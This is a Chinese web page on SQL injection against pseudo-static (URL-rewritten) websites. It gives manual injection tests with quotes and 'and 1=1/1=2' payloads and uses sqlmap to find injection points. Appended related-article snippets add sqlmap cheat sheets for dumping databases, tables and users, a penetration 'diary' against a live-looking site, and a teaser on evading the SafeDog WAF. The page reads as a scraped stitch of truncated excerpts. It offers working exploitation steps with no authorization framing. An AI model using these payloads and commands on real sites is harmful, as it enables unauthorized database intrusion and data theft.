伪静态注入

大家都熟悉动态网站的SQL注入了,网上有很多资源。

伪静态伪静态的注入点查找:

1.手工注入判断(和动态注入判断方法一样):

1)正常页面显示,如图:

2)在网址加上" ‘ ",网页不正常显示,如下图:

3)在网址加上" and 1=1 ",网页正常显示,如图:

4)在网址加上" and 1=2 ",网页不正常显示,如图:

由此可知该网页存在SQL注入

2.使用工具SQLMAP进行注入检测:

对网址进行构造,加一些特殊字符,如:*、#等等

检测如下:

时间: 2024-08-27 19:43:48

伪静态注入的相关文章

python脚本处理伪静态注入

目前有很多网站做了rewrite,如 /?id=1 /1 /1111.php 大趋势下,攻击的门槛逐渐增高.这样有利有弊,喜欢研究的会深入钻研,另一方面只会用工具不懂原理的则充斥到大小论坛水区. 实战举例: http://www.bxxxxxxxxxxxx.edu/magazine/index.php/mxxxxia/gallery/dickinsons-last-dance/1 这个点存在注入 Error Number: 1064 You have an error in your SQL s

渗透日记-利用SQLMAP伪静态注入

今日找到一个网站,做下安全检测,url是这样的: 不是传统的.php结尾,所以很多人认为这个不能注入,其实伪静态也能注入的,这个url虽然做了伪静态,但是很常规,试试能否注入.于是提交 http://www.xxxx.com/product/detail/id/3-1.html 页面的信息出现变化: 页面出现了变化,通常来说是存在SQL注入的. 注:因为+号会被url编码,所以我们通常使用减号来进行判断. 既然漏洞已经找到,接下来就很常规了,跑SQLMAP 语句: sqlmap.py -u ww

sqlmap 伪静态注入

伪静态通俗点说就是假的静态页面,也就是通过各种技术手段,让动态页面的URL看上去和静态页面的一样. 一般情况下我们都选择中转或者是手工来玩…… 今天看见了<sqlmap遇到url重写的示例> “高中时看见英文就头大,现在慢慢的发现当拿到一个工具时 先看看其官方给的 faq doc pdf等文档是非常有益的.url_rewrite 这个问题 国内外都有人问.D:\cygwin\pentest\database\sqlmap\doc \faq.pdf下面是官方给的解答.1.15 How to us

SqlMap post cookie注入小结

sqlmap SqlMap  POST注入 自动检测sqlmap -u “http://www.xxx.com/news?id=1″ –smart –level 3 –users 单个注入sqlmap -u “http://www.xxx.com/1.php” –data=”id=1″ 多个post值注入sqlmap -u “http://www.xxx.com/vuln.php” –data=”query=foobar;id=1″ –param-del=”;” -f –banner –dbs

SQLMAP注入教程

/** *    Author :xiaomiao * *    专注于互联网安全,网站开发 * *    如有问题,可以在新浪@苗_创 ***/1.SQLMAP用于Access数据库注入 (1)猜解是否能注入win:  python sqlmap.py -u "http://www.stronkin.com/en/CompHonorBig.asp?id=7" Linux : ./sqlmap.py -u "http://www.stronkin.com/en/CompHon

SQLMAP 实用技巧

基础版: 检查注入点 sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 列数据库信息 sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 --dbs 指定库名列出所有表 sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 --tables 指定库名表名列出所有字段 sqlmap -u

sqlmap

-u #注入点 -f #指纹判别数据库类型 -b #获取数据库版本信息 -p #指定可测试的参数(?page=1&id=2 -p “page,id”) -D “” #指定数据库名 -T “” #指定表名 -C “” #指定字段 -s “” #保存注入过程到一个文件,还可中断,下次恢复在注入(保存:-s “xx.log”  恢复:-s “xx.log” –resume) –columns #列出字段 –current-user #获取当前用户名称 –current-db #获取当前数据库名称 –u

11种常见sqlmap使用方法

sqlmap是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题. 一.SQLMAP用于Access数据库注入 (1) 猜解是否能注入 win: python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" Linux : .lmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7&q

全方位绕过安全狗

一.前言 安全狗是一款大家熟悉的服务器安全加固产品,据称已经拥有50W的用户量.最近经过一些研究,发现安全狗的一些防护功能,例如SQL注入.文件上传.防webshell等都可以被绕过,下面为大家一一介绍. 二.测试环境 本次测试环境为 中文版Win2003 SP2+PHP 5.3.28+Mysql 5.1.72 网站安全狗IIS版3.2.08417 三.SQL注入绕过 我们先写一个存在SQL注入漏洞的php: 1 <? 2 $uid = $_REQUEST['id']; 3 if(!$conn